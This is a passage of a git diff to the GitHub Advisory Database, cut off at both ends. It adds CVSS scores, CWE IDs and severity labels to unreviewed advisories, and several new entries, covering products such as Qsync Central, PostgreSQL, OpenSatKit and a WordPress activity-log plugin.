Pro‑class devices and can only be enabled by an administrator through the Embedded Web Server (EWS). Keeping CORS disabled unless explicitly required helps ensure that only trusted solutions can interact with the device.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json b/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json index e587d3b391fe0..f15dfa8bcbd55 100644 --- a/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json +++ b/advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9jhc-rr6j-x87m", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:30Z", "aliases": [ "CVE-2025-70084" ], "details": "Directory traversal vulnerability in OpenSatKit 2.2.1 allows attackers to gain access to sensitive information or delete arbitrary files via crafted value to the FileUtil_GetFileInfo function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json b/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json index 4a8a214fb911b..c5f0e2e7751b5 100644 --- a/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json +++ b/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9q6f-339m-42fv", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-58470" ], "details": "A path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json b/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json index 6554cbf8ca5a4..ca00d90aad615 100644 --- a/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json +++ b/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9wvg-f2jp-vhcf", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-57708" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-cmjp-m265-83j5/GHSA-cmjp-m265-83j5.json b/advisories/unreviewed/2026/02/GHSA-cmjp-m265-83j5/GHSA-cmjp-m265-83j5.json new file mode 100644 index 0000000000000..b2f55fdb94867 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cmjp-m265-83j5/GHSA-cmjp-m265-83j5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmjp-m265-83j5", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2025-13002" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Farktor Software E-Commerce Services Inc. E-Commerce Package allows Cross-Site Scripting (XSS).This issue affects E-Commerce Package: through 27112025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13002" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0063" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f3vj-j2m6-8hfj/GHSA-f3vj-j2m6-8hfj.json b/advisories/unreviewed/2026/02/GHSA-f3vj-j2m6-8hfj/GHSA-f3vj-j2m6-8hfj.json new file mode 100644 index 0000000000000..2f5378d560841 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f3vj-j2m6-8hfj/GHSA-f3vj-j2m6-8hfj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3vj-j2m6-8hfj", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2003" + ], + "details": "Improper validation of type \"oidvector\" in PostgreSQL allows a database user to disclose a few bytes of server memory. We have not ruled out viability of attacks that arrange for presence of confidential information in disclosed bytes, but they seem unlikely. Versions before PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2003" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fwjr-9qgx-rpmm/GHSA-fwjr-9qgx-rpmm.json b/advisories/unreviewed/2026/02/GHSA-fwjr-9qgx-rpmm/GHSA-fwjr-9qgx-rpmm.json new file mode 100644 index 0000000000000..89714dd4e2723 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fwjr-9qgx-rpmm/GHSA-fwjr-9qgx-rpmm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwjr-9qgx-rpmm", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2025-14014" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in NTN Information Processing Services Computer Software Hardware Industry and Trade Ltd. Co. Smart Panel allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Smart Panel: before 20251215.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14014" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0064" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T15:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json b/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json index 883bfe9252302..93fcab9d0f709 100644 --- a/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json +++ b/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fxh5-4p4v-76pm", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54152" ], "details": "A use of out-of-range pointer offset vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read sensitive portions of memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json b/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json index 3bebcc0e74783..15caf33132776 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json +++ b/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g4hh-hm34-58p5", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-57711" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json b/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json index e8db31c35257c..7e5976f2b065a 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json +++ b/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g4xh-r45m-435w", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-57709" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gxc8-m8f8-7c2c/GHSA-gxc8-m8f8-7c2c.json b/advisories/unreviewed/2026/02/GHSA-gxc8-m8f8-7c2c/GHSA-gxc8-m8f8-7c2c.json new file mode 100644 index 0000000000000..153b0910b0920 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gxc8-m8f8-7c2c/GHSA-gxc8-m8f8-7c2c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxc8-m8f8-7c2c", + "modified": "2026-02-12T15:32:47Z", + "published": "2026-02-12T15:32:47Z", + "aliases": [ + "CVE-2026-1671" + ], + "details": "The Activity Log for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the winter_activity_log_action() function in all versions up to, and including, 1.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view potentially sensitive information (e.g., the password of a higher level user, such as an administrator) contained in the exposed log files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1671" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3459369/winterlock" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cec4c17-24c1-4ed3-a3d3-9404ad7af420?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T13:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hgmp-6hmc-prfc/GHSA-hgmp-6hmc-prfc.json b/advisories/unreviewed/2026/02/GHSA-hgmp-6hmc-prfc/GHSA-hgmp-6hmc-prfc.json new file mode 100644 index 0000000000000..48bf03c62837a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hgmp-6hmc-prfc/GHSA-hgmp-6hmc-prfc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgmp-6hmc-prfc", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2005" + ], + "details": "Heap buffer overflow in PostgreSQL pgcrypto allows a ciphertext provider to execute arbitrary code as the operating system user running the database. Versions before PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2005" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2005" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json index afdeb6d072c82..369d3a4c8bb12 100644 --- a/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json +++ b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j5x8-2r52-c3ff", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T15:32:47Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20700" ], "details": "A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker with memory write capability may be able to execute arbitrary code. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json b/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json index 6e9daae3734c6..206925a5ab425 100644 --- a/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json +++ b/advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jh5g-w5hx-478p", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:30Z", "aliases": [ "CVE-2025-65480" ], "details": "An issue was discovered in Pacom Unison Client 5.13.1. Authenticated users can inject malicious scripts in the Report Templates which are executed when certain script conditions are fulfilled, leading to Remote Code Execution.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json b/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json index 43df98543ab5c..9f2eab41cc178 100644 --- a/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json +++ b/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jwg7-4hhr-69vp", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54150" ], "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json b/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json index efd3b28c1743f..6cf6e192de147 100644 --- a/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json +++ b/advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m447-7fh7-88xc", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:30Z", "aliases": [ "CVE-2025-70029" ], "details": "An issue in Sunbird-Ed SunbirdEd-portal v1.13.4 allows attackers to obtain sensitive information. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTP request options", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json b/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json index 3410d5db0ba2b..6b7443d9df98c 100644 --- a/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json +++ b/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m5h7-v442-fv53", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-58472" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-mq5v-x68w-mc4f/GHSA-mq5v-x68w-mc4f.json b/advisories/unreviewed/2026/02/GHSA-mq5v-x68w-mc4f/GHSA-mq5v-x68w-mc4f.json new file mode 100644 index 0000000000000..137a2cd9e08e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mq5v-x68w-mc4f/GHSA-mq5v-x68w-mc4f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq5v-x68w-mc4f", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2006" + ], + "details": "Missing validation of multibyte character length in PostgreSQL text manipulation allows a database user to issue crafted queries that achieve a buffer overrun. That suffices to execute arbitrary code as the operating system user running the database. Versions before PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2006" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2006" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json b/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json new file mode 100644 index 0000000000000..1692e0a9e70e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw3h-8vxv-jf6c", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2004" + ], + "details": "Missing validation of type of input in PostgreSQL intarray extension selectivity estimator function allows an object creator to execute arbitrary code as the operating system user running the database. Versions before PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2004" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json index 071847f8ce7a4..6aba968802fa1 100644 --- a/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json +++ b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qwvg-xq53-3vw2", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:30Z", "aliases": [ "CVE-2025-70083" ], "details": "An issue was discovered in OpenSatKit 2.2.1. The DirName field in the telecommand is provided by the ground segment and must be treated as untrusted input. The program copies DirName into the local buffer DirWithSep using strcpy. The size of this buffer is OS_MAX_PATH_LEN. If the length of DirName is greater than or equal to OS_MAX_PATH_LEN, a stack buffer overflow occurs, overwriting adjacent stack memory. The path length check (FileUtil_AppendPathSep) is performed after the strcpy operation, meaning the validation occurs too late and cannot prevent the overflow.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json index 54fbd20431317..460f9d9e686de 100644 --- 